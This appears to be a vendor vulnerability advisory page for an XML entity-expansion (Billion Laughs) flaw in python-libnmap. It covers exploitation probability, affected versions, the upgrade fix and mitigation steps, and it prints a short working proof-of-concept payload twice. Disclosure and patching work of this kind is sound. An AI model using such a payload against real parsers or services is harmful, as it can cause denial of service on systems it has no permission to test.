NIST deprecates RSA-2048 from 2030. Find every one of them before attackers do.
🐍
🐍 PyPI
Not in CISA KEV
HIGH severity

XML Injection in python-libnmapGHSA-9ccv-p7fg-m73x

HIGHFix: savon-noir/python-libnmap@71b7077

GHSA-9ccv-p7fg-m73x is a high-severity (CVSS 7.5) CWE-91 vulnerability in python-libnmap. 1 public exploit or proof-of-concept reference is indexed, so weaponization risk is real. A fix is available for python-libnmap — see the affected versions and patch details below.

Also known asCVE-2019-1010017PYSEC-2019-218
Published
Updated
Affected
1 pkg
Patched
1 / 1
Exploits
1 known
Exploitation data as of Nov 6, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

EPSS Exploitation Probability

via FIRST.org ↗
1.5%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs75th percentile — riskier than 75% of all scored CVEsHighest risk
0.06%0.73%1.40%2.07%0.6%1.5%May 26Sep 26Nov 26

Probability of exploitation in the next 30 days, from FIRST.org EPSS.

How urgent is this, really

Where this sits among everything scored

Real-World Exposure

1 pkg affected
🐍python-libnmap

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.

Description

Description

python-libnmap is affected by a Billion-Laughs -style XML injection vulnerability.

PoC

ty = NmapParser()

payload = """
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz><hello>&lol3;</hello></lolz>
"""

ty.parse(payload)

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐍PyPIpython-libnmapall versions0.7.2pip install --upgrade 'python-libnmap==0.7.2'

Affected Products

1 product · 1 configurations
Application
libnmaplibnmap
< 0.6.3
range
Exploits & PoCs
1

Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for python-libnmap, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update python-libnmap to 0.7.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-9ccv-p7fg-m73x is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

Frequently Asked Questions

### Description python-libnmap is affected by a Billion-Laughs -style XML injection vulnerability. ### PoC ```python ty = NmapParser() payload = """ <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> ]> <lolz><hello>&lol3;</hello></lolz> """ ty.parse(payload) ```
O3 Security · Impact-Aware SCA

Is GHSA-9ccv-p7fg-m73x in your dependencies?

Find it across PyPI, including transitive dependencies.

XML Injection in python-libnmap (High 7.5)